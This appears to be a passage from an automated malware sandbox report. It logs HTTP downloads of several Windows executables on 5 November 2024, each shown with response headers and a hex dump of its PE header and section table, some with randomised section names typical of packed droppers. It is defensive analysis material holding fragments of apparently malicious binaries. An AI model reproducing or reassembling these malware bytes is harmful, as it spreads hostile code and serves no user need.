00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 77 64 6b 70 7a 67 78 00 50 19 00 00 f0 57 00 00 4a 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 75 61 75 76 6e 63 69 00 10 00 00 00 40 71 00 00 04 00 00 00 d4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 71 00 00 22 00 00 00 d8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:30 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Tue, 05 Nov 2024 16:52:19 GMTConnection: keep-aliveETag: "672a4d43-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3b 4d 2a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 61 b8 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:35 GMTContent-Type: application/octet-streamContent-Length: 2778112Last-Modified: Tue, 05 Nov 2024 16:52:43 GMTConnection: keep-aliveETag: "672a4d5b-2a6400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 ff 7f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 6e 75 72 76 72 73 78 00 20 2a 00 00 a0 00 00 00 04 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6b 6e 68 76 71 64 72 00 20 00 00 00 c0 2a 00 00 04 00 00 00 3e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 42 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:42 GMTContent-Type: application/octet-streamContent-Length: 2095616Last-Modified: Tue, 05 Nov 2024 16:58:03 GMTConnection: keep-aliveETag: "672a4e9b-1ffa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 77 64 6b 70 7a 67 78 00 50 19 00 00 f0 57 00 00 4a 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 75 61 75 76 6e 63 69 00 10 00 00 00 40 71 00 00 04 00 00 00 d4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 71 00 00 22 00 00 00 d8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:46:43 GMTContent-Type: application/octet-streamContent-Length: 2778112Last-Modified: Tue, 05 Nov 2024 16:52:45 GMTConnection: keep-aliveETag: "672a4d5d-2a6400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 ff 7f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 6e 75 72 76 72 73 78 00 20 2a 00 00 a0 00 00 00 04 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6b 6e 68 76 71 64 72 00 20 00 00 00 c0 2a 00 00 04 00 00 00 3e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 42 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 